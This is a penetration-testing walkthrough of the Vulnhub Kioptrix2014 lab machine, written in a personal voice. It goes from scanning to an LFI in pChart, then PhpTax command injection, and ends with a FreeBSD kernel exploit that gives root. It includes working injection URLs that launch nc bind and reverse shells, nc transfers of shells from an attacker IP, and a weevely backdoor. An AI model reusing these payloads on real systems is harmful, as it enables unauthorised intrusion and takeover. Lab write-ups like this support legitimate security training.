Vulnhub Kioptrix2014
Vulnhub
Kioptrix2014
Enumeration
Like always let’s start with a scan
nmap -Pn -sS -sC -vv -T 4 -p- 192.168.1.121
Nmap scan report for kioptrix2014 (192.168.1.134)
Host is up (0.00024s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21
OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21
OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:04:AC:9C (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8
cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms kioptrix2014 (192.168.1.134)
While that is running, i decided to check if it had a website.
It did, the website contained a simple “It Works!”
I looked at the source code.
<html>
<head>
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
Looking at the comment a decided to append it to the url. It redirected us to the following url
http://192.168.1.134/pChart2.1.3/examples/index.php
The website contains a lot of functions to create graphs…
Dirb
I decided to run dirb to see if it finds something interesting.
dirb http://192.168.1.134/pChart2.1.3/ /usr/share/dirb/wordlists/common.txt
dirb http://192.168.1.134/ /usr/share/dirb/wordlists/common.txt
I think get something particularly good. A bunch of indexable directories that didn’t contain anything good.
Nikto
So now nikto, let’s see what he has to say.
nikto -h 192.168.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.134
+ Target Hostname: 192.168.1.134
+ Target Port: 80
+ Start Time: 2017-05-17 05:00:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
mod_ssl/2.2.21 seems vulnerable. Used seachsploit to lookup mod_ssl.
searchsploit mod_ssl
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2) | ./unix/remote/764.c
Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | ./multiple/dos/21575.txt
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1) | ./unix/remote/21671.c
Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit | ./unix/remote/40347.txt
Apache/mod_ssl 2.0.x - Remote Denial of Service | ./linux/dos/24590.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
We got OpenFuckv2 that looks promising, but after looking at the source code it seems to target apache1x not apache2x.
pChart2.1.3
So i decided to searchsploit pChart
searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/kioprix# searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | ./php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
We got a hit, after reading the file, it looks like the webapps is vulnerable to LFI.
hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
And it does work. I looked at the /etc/passwd and other typical files. I had to google where the default apache2 install goes in bsd. We know it’s a FreeBSD machine and it’s using apache 2.2.21. The location is /usr/local/etc/apache22/httpd.conf . That file contains the virtualhosts configuration. Near the end of the file is the interesting part.
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
It looks like we need to change our Broswer Agent to Mozilla/4.0
Phptax
So we got this website that looks is made to submit taxes. I played around with
it for a few minutes and decided to searchsploit it.
searchsploit phptax
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution | ./php/webapps/25849.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
We got more vulnerable software.
So it looks that we can execute commands directly on the url.
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
This would create a reverse tcp connection, but this will not work on our
machine because it’s using an nc version that does not support the option -e.
If we look at the 21665.txt, we can see that it converts the file and puts it
in data/pdf/ . If we navigate to the page we’ll see all the previous upload.
We can maybe try to upload a php reverse shell.
So this one was tricky for me, took me forever to figure a way in.
By looking at the httpd-error.log from the previous exploit, i looked that the script is looking for a file located in the folder files.
The page is browseable and is indexed to see all the files it calls to create those pdf/png. So i tried writing something in it using echo.
This would append the worse YO at the end of the file located in ./files/1040d-pg1.calc and it did. Now that i know i can write into it, i’ll setup a ncat to transfer a file
nc -nlv 1234 < php-reverse-shell
http://192.168.1.134:8080/phptax/index.php?pfilez=yp;nc%20192.168.1.148%201234%20%3E%3E%20./files/shell.txt.php;&pdf=make Using that url i managed to upload my reverse shell, the only thing left is to setup a listener and load the me.txt.php
Weevely the gorgeous
First thing, i’ll upload a weevely reverse shell because it’s more awesome
shell than a regular reverse shell. I tried uploading it to the same location
as the previous reverse shell but weevely wouldn’t connect. I guess it’s the
browser agent that is blocking it since i’m getting a 403 error. So using the
first reverse shell i’ll upload the second one.
I’ll browse to /usr/local/www/apache22/data/pChart2.1.3 the location of the
first website we encountered. I’ll setup another ncat listener to transfer a
file. I tried curl and wget and it looks like we can’t use them.
On kali box
weevely generate me.php toor
nc -nlv 1234 < me.php
On kioptrix
pwd
/usr/local/www/apache22/data/pChart2.1.3
nc 192.168.1.148 > me.php
On kali box
weevely http://192.168.1.134/pChart2.1.3/me.php toor
Well… Nothing seems to work. I tried transfering it to multiple places and file names and nada. I guess it’s python ? Let’s move on then.
Enumeration
So like always first thing first
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
FreeBSD 9.0
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation | ./freebsd/local/26368.c
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | ./freebsd/local/28718.c
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
After reading both of them, i decided to try the first one 26368.c I used nc again to transfer it and used gcc to compile it.
nc 192.168.1.148 1234 > exploit.c
gcc exploit.c
./a.out
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
Well yeah, that’s good game.
It literally took me forever to get a shell on the machine. Like FOREVER!